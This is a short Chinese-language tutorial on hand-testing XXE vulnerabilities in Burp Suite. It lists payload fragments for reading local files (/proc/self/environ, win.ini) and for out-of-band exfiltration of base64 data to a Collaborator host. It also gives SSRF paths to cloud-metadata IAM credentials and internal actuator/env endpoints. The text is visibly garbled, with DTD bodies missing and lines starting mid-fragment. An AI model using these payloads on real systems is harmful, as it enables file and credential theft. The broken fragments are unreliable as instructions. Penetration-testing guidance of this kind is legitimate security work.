Burp Suite 手动测试 XXE 漏洞需三步:1. 识别 XML 输入点(查 Content-Type、功能点、XML 结构、伪文件上传);2. 构造 DTD 测试回显或盲 XXE(用 Burp Collaborator 验证外带);3. 延伸利用 SSRF 探测云元数据或内网服务。
用 Burp Suite 测试 XXE 漏洞,核心是识别 XML 输入点、构造恶意 DTD、观察响应或带外交互。整个过程不依赖自动化扫描,重在手动验证和逻辑判断。
很多应用并不明显暴露 XML 接口,需主动寻找:
ww-form-urlencoded(部分接口会把 XML 当作参数值提交)123
在 Repeater 中修改请求,插入外部实体定义并引用:
)后、根元素前添加 DTD:root:x:0:0:root:/root:/bin/bash 等内容,说明成功读取文件file:///proc/self/environ(环境变量)、file:///etc/hosts、file:///C:/windows/win.ini(Windows)多数生产环境不回显 XML 解析结果,需借助带外(Out-of-Band)技术:
abc123.oastify.com)SYSTEM "http://abc123.oastify.com/?data=base64_encoded_content"(需配合服务端编码逻辑)XXE 可作为 SSRF 的跳板,尤其在云环境效果显著:
SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/"
/latest/meta-data/iam/security-credentials/admin
SYSTEM "http://10.0.1.10:8080/actuator/env"(Spring Boot)、http://127.0.0.1:5000/api/status
https://;若 DNS 解析失败,优先试 HTTP + IP